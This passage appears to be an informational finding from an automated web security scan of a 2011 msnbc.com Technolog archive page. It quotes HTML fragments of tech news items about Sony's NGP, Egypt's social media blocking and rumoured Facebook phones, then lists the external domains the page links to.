<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" data-Text="Pre-caffeine tech: Security cracks, '70s nerds">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlineCode__5936907" class="inlineCode photo_align_block" data-contentid="5936907"><object width="592" height="346" id="msnbc8a9862" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10,0,0,0"><param name="movie" value="http://www.msnbc.redacted/id/32545640" />
...[SNIP]...
<p>President of SCE Worldwide Studios, Shuhei Yoshida, told the audience at the Tokyo event that the NGP's graphics are of PlayStation 3 quality, reported game blog Kotaku, which had reporter <a target="_blank" href="http://kotaku.com/5744297/live+blogging-sonys-psp2-press-event">Brian Ashcraft on site and live blogging from the event.</a>
...[SNIP]...
<div id="vine-inlinePhoto__5932923" data-contentId="5932923" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5932923.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5932923.jpg" width="600" height="396" alt="" /><p class="photo_credit">
...[SNIP]...
</span>And famed "Metal Gear" creator Hideo Kojima demonstrated "Metal Gear Solid 4: Guns of the Patriots" running on the NGP. In fact, <a target="_blank" href="http://kotaku.com/5744571/metal-gear-solid-4-lost-planet-yakuza-shown-playable-on-psp2">Kotaku reports</a>
...[SNIP]...
<p>The NGP certainly isn't a small device. Sony calls it a "Super Oval Design" which is meant to be comfortable for long play sessions, according to Sony's Jeff Rubenstein, who live blogged the event <a target="_blank" href="http://blog.us.playstation.com/2011/01/26/live-from-japan-playstation-meeting-2011/">via the PlayStation Blog</a>. And at 182 mm by 18.6 mm by 83.5 mm, it is larger than the current model PSP 3000. In fact, for a look at just how big it is, check out Kotaku's visual <a target="_blank" href="http://kotaku.com/5744563/lets-see-how-big-this-psp2-really-is">size comparison here</a>
...[SNIP]...
<div id="vine-inlinePhoto__5933512" data-contentId="5933512" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="wbenedetti/5933512.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/wbenedetti/5933512.jpg" width="600" height="409" alt="" /><div class="photo_credit_container">
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><em>
...[SNIP]...
</em><a target="_blank" href="http://twitter.com/WindaBenedetti"><em>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" data-Text="Sony reveals PSP successor - the Next Generation Portable">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927180" data-contentId="5927180" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5927180.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5927180.jpg" width="280" height="135" alt="" />
...[SNIP]...
<p>On Twitter, the short-messaging blog where posts are limited to 140 characters, access from Egypt was difficult as reported by <a href="http://www.herdict.org/web/">Herdict.org</a>
...[SNIP]...
million members and has the largest number of users of Facebook’s Arabic interface (2.2 million Facebook Arabic users in Egypt, versus 1.8 million in the Kingdom of Saudi Arabia)," according to <a href="http://www.spotonpr.com/egypt-facebook-demographics/">Spot On PR</a>
...[SNIP]...
networking shut-out has echoes of Iran 2-1/2 years ago, when in the wake of the presidential election and protests, the government there worked to block network and dial-up access to Facebook and <a href="http://redtape.msnbc.com/2009/06/twitter-1-censorship-0-why-its-working.html">Twitter</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" data-Text="Egypt may be blocking Twitter and Facebook as protests grow">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</em> - HTC is slated to unveil not one but two Facebook phones in February at the Mobile World Congress in Barcelona, according to <a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a>
...[SNIP]...
<p>City AM's reporter may have reported on the existence of the second Google Nexus phone, as <a href="http://mashable.com/2010/10/26/nexus-two/">Mashable points out</a>
...[SNIP]...
<em><a href="http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone">City AM</a> via <a href="http://www.businessinsider.com/facebook-phone-wont-be-a-new-platform-2011-1">Business Insider</a> and <a href="http://mashable.com/2011/01/26/htc-to-unveil-2-facebook-phones-next-month/">Mashable</a>
...[SNIP]...
<i>Catch up with Wilson on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>, or skip the one-on-one and join the conversation at our <a href="http://www.facebook.com/technolog">Technolog Facebook page</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" data-Text="Rumor: Facebook phones are coming!!!">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927996" data-contentId="5927996" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="wbenedetti/5927996.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5927996.jpg" width="280" height="173" alt="" /><p class="photo_credit">
...[SNIP]...
<p>The Sony Ericsson Xperia Play phone has run rampant in the rumor mill for months now, but <a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">Engadget reports</a>
...[SNIP]...
<p>Engadget reminds readers that "what we're seeing here is subject to changes." They expect Sony to reveal many of the final details about the phone at the <a target="_blank" href="http://www.mobileworldcongress.com/">Mobile World Congress taking place in Spain</a>
...[SNIP]...
<p>Check out the entirety of Engadget's coverage and their many photos of the device <a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">here</a>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><i>
...[SNIP]...
</i><a target="_blank" href="http://twitter.com/WindaBenedetti"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" data-Text="Sony's PlayStation phone is for real">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5925431" data-contentId="5925431" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5925431.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5925431.jpg" width="280" height="157" alt="" />
...[SNIP]...
<p>It doesn't appear to be a huge issue, but it is an irritating one — many Facebook users have shared their befuddlement on <a href="http://www.facebook.com/topic.php?uid=31987371885&topic=14747&post=70129">Facebook's discussion page</a>
...[SNIP]...
<p>Hat tip to <a href="http://valleywag.gawker.com/5743293/facebook-mobile-says-to-call-911">Valleywag</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" data-Text="Ignore Facebook messages to call 911 ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>It's all part of Facebook's "Data Privacy Day" celebration, a poorly promoted — <a href="http://dataprivacyday2010.org/about/">yet totally real</a>
...[SNIP]...
<p>According to <a href="http://blog.facebook.com/blog.php?post=486790652130">Facebook's Data Privacy Day blog post</a>
...[SNIP]...
<strong>Here's some other known bugs <a href="http://www.facebook.com/help/?search=known+issues#!/help/?page=777">Facebook is actively dealing with right now</a>
...[SNIP]...
<p>And in the grand spirit of Data Privacy Day, <a href="http://blog.facebook.com/blog.php?post=436800707130">here's some current Facebook security information you should know</a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" data-Text="Locked out of Facebook? Happy 'Data Privacy Day!' ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.347. http://technolog.msnbc.redacted/_nv/more/section/archive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.redacted
Path:	/_nv/more/section/archive

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.redacted/_nv/more/section/archive?date=2011/1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://bit.ly/caLhBE
http://blekko.com/
http://blog.facebook.com/blog.php?post=436800707130
http://blog.facebook.com/blog.php?post=486790652130
http://blog.stephenwolfram.com/2011/01/jeopardy-ibm-and-wolframalpha/
http://blog.us.playstation.com/2011/01/26/live-from-japan-playstation-meeting-2011/
http://blogs.cfr.org/cook/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://consumerist.com/2011/01/virgin-mobile-adding-5gb-cap-and-throttle-21511.html
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://curmudgeons.blogspot.com/
http://dataprivacyday2010.org/about/
http://dateline.msnbc.com/
http://digitaldaily.allthingsd.com/20110128/90-percent-of-att-iphone-subs-still-under-contract/?mod=twitter&utm_source=twitterfeed&utm_medium=twitter
http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
http://earthsky.org/
http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas
http://en.wikipedia.org/wiki/Main_Page
http://english.aljazeera.net/
http://english.aljazeera.net/news/middleeast/2011/01/201112523026521335.html
http://eurekalert.org/
http://feeds.gawker.com/~r/lifehacker/full/~3/VbASl0_jzW8/amazon-security-flaw-may-make-your-old-password-easy-to-crack
http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist
http://gizmodo.com/5745478/is-internet-access-a-human-right
http://globalvoicesonline.org/specialcoverage/egypt-protests-2011/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://kotaku.com/5744297/live+blogging-sonys-psp2-press-event
http://kotaku.com/5744563/lets-see-how-big-this-psp2-really-is
http://kotaku.com/5744571/metal-gear-solid-4-lost-planet-yakuza-shown-playable-on-psp2
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247
http://lib.newsvine.com/chrome/technolog/style.css?v=23247
http://log.newsvine.com/poke.gif?x=0|26&get=martinblog&rand=53290623&do=msnbc.redacted&ad=53:9:80;44::;56:27:108;58:58:178;58:58:178;58:58:178;53:9:80;86:86:270;87:87:209;50::
http://lynch.foreignpolicy.com/posts/2011/01/26/will_the_arab_revolutions_spread
http://malexj.tk/6M
http://malexj.wordpress.com/
http://mashable.com/2010/10/26/nexus-two/
http://mashable.com/2011/01/26/htc-to-unveil-2-facebook-phones-next-month/
http://mashable.com/2011/01/27/youtube-flickr-show-escalating-violence-in-egyptian-protests/
http://michaelwann.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://nasaengineer.com/
http://news.bbc.co.uk/2/hi/8548190.stm
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://phx.corporate-ir.net/phoenix.zhtml?c=176060&p=irol-newsArticle&ID=1521090&highlight=
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://player.ooyala.com/player.js?embedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&height=354&deepLinkEmbedCode=d0MGgwMjrtm0rSeX9bTc29IpE0zQQ1Rj&width=630
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/
http://rachel.msnbc.com/
http://redtape.msnbc.com/
http://redtape.msnbc.com/2009/06/twitter-1-censorship-0-why-its-working.html
http://redtape.newsvine.com/
http://renesys.com/about/index.shtml
http://science.slashdot.org/
http://seedmagazine.com/
http://spacefellowship.com/
http://suzanne-choney.newsvine.com/
http://techcrunch.com/2010/07/19/kindle-sales/
http://techcrunch.com/2011/01/27/kindle-books-overtake-paperback-books-to-become-amazons-most-popular-format/
http://techcrunch.com/2011/01/28/egypt/
http://technolog2.newsvine.com/
http://thelede.blogs.nytimes.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/?q=%23Egypt
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/WindaBenedetti
http://twitter.com/b0yle
http://twitter.com/helenaspopkin
http://twitter.com/malexjohnson
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://valleywag.gawker.com/5743293/facebook-mobile-says-to-call-911
http://wbenedetti.newsvine.com/
http://www-03.ibm.com/innovation/us/watson/
http://www.almasryalyoum.com/en/subchannel/Top%20stories
http://www.att.com/gen/press-room?pid=18952&cdvn=news&newsarticleid=31519&mapcode=financial
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.boingboing.net/2011/01/28/online-science-ficti.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+boingboing%2FiBag+%28Boing+Boing%29
http://www.businessinsider.com/facebook-phone-wont-be-a-new-platform-2011-1
http://www.businessinsider.com/microsoft-1978-photo-2011-1
http://www.businessinsider.com/sai
http://www.byjohnroach.com/
http://www.cdt.org/
http://www.cityam.com/news-and-analysis/facebook-launch-first-mobile-phone
http://www.collectspace.com/
http://www.crunchgear.com/2011/01/27/photographers-youre-now-officially-free-to-shoot-in-public-places-and-outside-federal-buildings/
http://www.dailygrail.com/
http://www.delish.com/
http://www.dreichel.com/dr_zoe.htm
http://www.economist.com/node/18013760
http://www.eiu.com/public/
http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/anarchismnews/posts/180233175348223
http://www.facebook.com/cosmiclog
http://www.facebook.com/help/?search=known+issues
http://www.facebook.com/home.php?id=1151660271
http://www.facebook.com/pages/Alex-Johnson-msnbccom/136854296350964
http://www.facebook.com/pages/manage/
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://cosmiclog.msnbc.redacted/_news/2011/01/27/5935463-search-engines-could-play-jeopardy?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5931513-sony-reveals-psp-successor-the-next-generation-portable?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/27/5935136-android-getting-games-from-sony?chromedomain=technolog
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926198-egypt-may-be-blocking-twitter-and-facebook-as-protests-grow
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934345-pre-caffeine-tech-security-cracks-70s-nerds
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/27/5934826-verizon-offering-att-iphone-trade-in-program
